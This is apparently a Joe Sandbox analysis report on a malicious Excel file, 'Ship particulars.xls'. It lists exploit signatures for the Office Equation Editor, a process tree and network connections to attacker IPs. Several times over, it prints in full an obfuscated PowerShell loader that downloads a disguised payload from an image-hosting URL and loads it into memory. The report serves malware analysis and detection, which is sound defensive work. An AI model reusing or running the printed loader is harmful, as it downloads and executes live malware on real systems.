Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ship particulars.xls

Overview

General Information

Sample name:Ship particulars.xls
Analysis ID:1467087
MD5:1746950a937d2735d7ad8b8633393471
SHA1:3745c72e69666f9799f25d298f71ea05844a0226
SHA256:91f02087f468183375ca7489c8936bb562e6d76a4cf39d6402aa9ee672e1c478
Tags:xls
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
AI detected suspicious Excel or Word document
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1324 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 1432 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3276 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3352 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1d21:$obj1: \objhtml
  • 0x1d5a:$obj2: \objdata
  • 0x1d46:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1d21:$obj1: \objhtml
  • 0x1d5a:$obj2: \objdata
  • 0x1d46:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3440JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 3440INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x34882:$b2: ::FromBase64String(
    • 0x3ac7d:$b2: ::FromBase64String(
    • 0x52523:$b2: ::FromBase64String(
    • 0x52ae0:$b2: ::FromBase64String(
    • 0x532b7:$b2: ::FromBase64String(
    • 0x53a35:$b2: ::FromBase64String(
    • 0x54023:$b2: ::FromBase64String(
    • 0x8acfa:$b2: ::FromBase64String(
    • 0x9158c:$b2: ::FromBase64String(
    • 0x91b47:$b2: ::FromBase64String(
    • 0x949fa:$b2: ::FromBase64String(
    • 0x95083:$b2: ::FromBase64String(
    • 0x9b5d2:$b2: ::FromBase64String(
    • 0x9bb8d:$b2: ::FromBase64String(
    • 0x9ee50:$b2: ::FromBase64String(
    • 0x9f40c:$b2: ::FromBase64String(
    • 0xa0440:$b2: ::FromBase64String(
    • 0xa6457:$b2: ::FromBase64String(
    • 0xa6730:$b2: ::FromBase64String(
    • 0xa75a7:$b2: ::FromBase64String(
    • 0xa8dce:$b2: ::FromBase64String(

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.178.139, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3276, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3276, TargetFilename: C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine|base64offset
    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49172, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3276, Protocol: tcp, SourceIp: 198.46.178.139, SourceIsIpv6: false, SourcePort: 80
    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine|base64offset
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine|base64offset
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine|base64offset
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')", CommandLine|base64offset
    Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 91.92.254.29, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3352, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1324, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" , ProcessId: 3352, ProcessName: wscript.exe
